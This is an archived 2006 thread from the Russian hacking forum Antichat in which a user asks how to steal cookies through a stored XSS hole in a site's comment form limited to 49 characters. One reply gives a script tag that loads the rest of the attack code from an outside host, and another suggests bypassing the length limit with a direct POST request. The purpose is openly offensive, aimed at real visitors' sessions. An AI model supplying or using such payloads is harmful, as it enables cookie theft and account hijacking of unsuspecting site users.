Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   49 символов для Xss атаки (https://forum.antichat.xyz/showthread.php?t=27595)

cop 19.11.2006 23:00

49 символов для Xss атаки
 
Есть уязвимость на сайте: в форме комментариев можно вписать html теги. Как можно сформировать такой JavaScript, шоб своровать куки для формы в 49 символов (обрезаеться базой)?

GreenBear 19.11.2006 23:06

http://forum.antichat.ru/thread25933.html

cop 19.11.2006 23:11

Green_Bear, да, это все понятно. У меня для формы доступно только 49 символов, я не могу ничего придумать, шоб как-нить сформировать рабочий код. (я в первом сообщении исправил про 49 символов)

_Great_ 19.11.2006 23:13

<script src='http://site.ru/a.js'></script>

А в site.ru/a.js написать остальной код

nc.STRIEM 19.11.2006 23:55

А чем эти 49 символов обрезаються???? Есле это ограничение в форме, то прост пошли POST запрос, в самао скрипте редко длинна проверяеться!
а ваше смотри что те _Great_ написал! ;)

_Great_ 20.11.2006 00:04

Цитата:

А чем эти 49 символов обрезаються???? Есле это ограничение в форме, то прост пошли Post запрос, в самао скрипте редко длинна проверяеться!
он же написал - базой.. а это хреново. Но моим способом уложиться можно

cop 20.11.2006 00:19

супер, ребята спасибо!!!!

cop 20.11.2006 00:20

не допер шото сам :(

jonart 20.11.2006 17:17

_Great_
а у мня вопрос а если перед вставкой в бд например он проверяет кол-во символов поступающих получиться что он еще и посчитает все символы и с файла который вставляем ведь!Верно?

GreenBear 20.11.2006 17:20

ну ты гонишь. ничего там не будет считать с файла.


Время: 21:15